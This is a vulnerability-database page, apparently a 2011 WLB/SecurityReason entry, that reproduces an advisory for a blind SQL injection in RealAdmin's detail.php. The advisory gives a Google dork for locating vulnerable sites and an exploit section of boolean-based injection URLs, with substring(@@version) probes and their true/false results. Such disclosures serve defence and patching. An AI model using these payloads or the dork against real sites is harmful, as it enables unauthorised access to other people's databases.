|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : AtT4CKxT3rR0r1ST SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : RealAdmin (detail.php) Blind Sql Injection Vulnerability ======================================================== ####### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : RealAdmin .:. Download Script: http://www.redcow.ca/products/realadmin/ .:. Bug Type : Blind Sql Injection .:. Dork : "Powered by RealAdmin and Red Cow Technologies, Inc." ####### ===[ Exploit ]=== www.site.com/detail.php?id=[Blind SQL INJECTION] www.site.com/detail.php?id=NULL+and+1=1 >>> True www.site.com/detail.php?id=NULL+and+1=2 >>> False www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=5 >>> True www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=4 >>> False Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |